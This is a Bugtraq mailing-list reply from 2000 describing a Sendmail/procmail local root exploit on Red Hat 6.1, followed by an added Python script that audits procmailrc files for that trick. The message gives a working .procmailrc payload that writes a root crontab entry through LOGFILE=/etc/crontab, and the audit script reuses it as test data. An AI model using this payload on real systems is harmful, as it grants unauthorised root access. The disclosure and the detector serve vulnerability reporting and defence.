Bugtraq mailing list archives

Re: Sendmail local root exploit on linux 2.2.x


From: iwi () ATM OX AC UK (Alan Iwi)
Date: Mon, 12 Jun 2000 09:28:14 -0000


then create a .forward with:
|/path/to/add

I tried this on an out-of-the-box Redhat 6.1 system.
In fact, on this system sendmail is configured to use
smrsh, which forbids piping mail to arbitrary programs
with .forward.  But such systems are still vulnerable,
because sendmail is configured to run procmail.  Just
change the exploit to use a .procmailrc file instead of
.forward.  Here's an example:

        LOGFILE=/etc/crontab
        LOG="* * * * * root /tmp/my_dodgy_script.sh
        "
        LOGABSTRACT=no
        
        :0
        /dev/null

Alan
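
An added audit sketch, not part of the original message or of procmail: it parses a user's .procmailrc and flags the two traits of the file quoted above, a LOGFILE that resolves outside the user's home directory and a LOG value shaped like a crontab line. The function names and the /home/alice path are assumptions made for the example, and only $HOME is expanded in paths.

```python
import os
import re

ASSIGN = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.*)$")
# Five schedule fields, a user and a command: the shape of an /etc/crontab line.
CRON_LINE = re.compile(r"^\s*(?:[\d*/,\-]+\s+){5}\S+\s+\S", re.M)

def parse_assignments(text):
    """Return [(name, value)] for procmailrc assignments, joining multi-line quoted values."""
    out, lines, i = [], text.splitlines(), 0
    while i < len(lines):
        m = ASSIGN.match(lines[i])
        i += 1
        if not m:
            continue  # recipe line, comment or blank
        name, value = m.group(1), m.group(2)
        while value.count('"') % 2 == 1 and i < len(lines):
            value += "\n" + lines[i]  # unbalanced quote: value continues
            i += 1
        out.append((name, value.strip().strip('"')))
    return out

def audit_procmailrc(text, home):
    """Return a list of findings for one user's procmailrc (empty = clean)."""
    findings = []
    home = os.path.normpath(home)
    for name, value in parse_assignments(text):
        if name == "LOGFILE":
            # Simplification: only $HOME is expanded; relative paths resolve against home.
            path = os.path.normpath(os.path.join(home, value.replace("$HOME", home)))
            if path != home and not path.startswith(home + os.sep):
                findings.append("LOGFILE outside home: " + path)
        elif name == "LOG" and CRON_LINE.search(value):
            findings.append("LOG value is shaped like a crontab entry")
    return findings

# The file quoted in the message above, and a constructed benign one.
QUOTED = '''LOGFILE=/etc/crontab
LOG="* * * * * root /tmp/my_dodgy_script.sh
"
LOGABSTRACT=no

:0
/dev/null
'''
BENIGN = 'LOGFILE=$HOME/procmail.log\nLOG="filtered\n"\n\n:0\n* ^Subject:.*test\ntestbox\n'

if __name__ == "__main__":
    print(audit_procmailrc(QUOTED, "/home/alice"), audit_procmailrc(BENIGN, "/home/alice"))
```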

